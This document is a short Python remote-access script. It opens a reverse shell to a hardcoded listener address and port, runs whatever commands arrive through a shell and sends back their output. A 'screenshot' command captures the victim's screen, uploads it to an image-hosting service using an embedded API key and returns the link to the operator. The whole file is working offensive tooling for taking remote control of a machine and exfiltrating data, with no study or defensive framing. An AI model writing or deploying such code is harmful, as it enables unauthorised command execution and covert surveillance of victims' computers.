#!/usr/bin/env python3
import os
import socket
import subprocess
import base64
import requests
from PIL import ImageGrab

LHOST = '10.195.100.153' # add ip address listner
LPORT = int(7777) # add port

SendBack=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
SendBack.connect((LHOST,LPORT))
while True :
    path = os.getcwd()+ ' > '
    SendBack.sendall(bytes(path.encode()))
    data = SendBack.recv(1024).decode('latin-1')
    try:
        Data = subprocess.run(data,shell=True,capture_output=True)
        Data =bytes(Data.stdout.decode('latin-1').encode())
        SendBack.sendall(Data)
    except Exception  :
        continue 
    if 'quit' in data:
        break
    if 'cd' in data:
        try:
            os.chdir(str(data.split()[1].replace('\n','')))
        except Exception:
            continue
    if 'screenshot' in data :      
        snapshot = ImageGrab.grab() 
        file = "scr.jpg"
        snapshot.save(file)
        with open("scr.jpg", "rb") as file:
            url = "https://api.imgbb.com/1/upload"
            payload = {
                "expiration": "600",
                "key":"b205eda46389c875c103903a9adb1b3f",
                "image": base64.b64encode(file.read()),
            }
            res = requests.post(url, payload)
            respones =res.text.split('url')
            respones = respones[2].split(',')[0].replace('"','').replace(':','',1).replace('\\','') +'\n'
            SendBack.sendall(bytes(path.encode())), SendBack.sendall(bytes(respones.encode()))
            
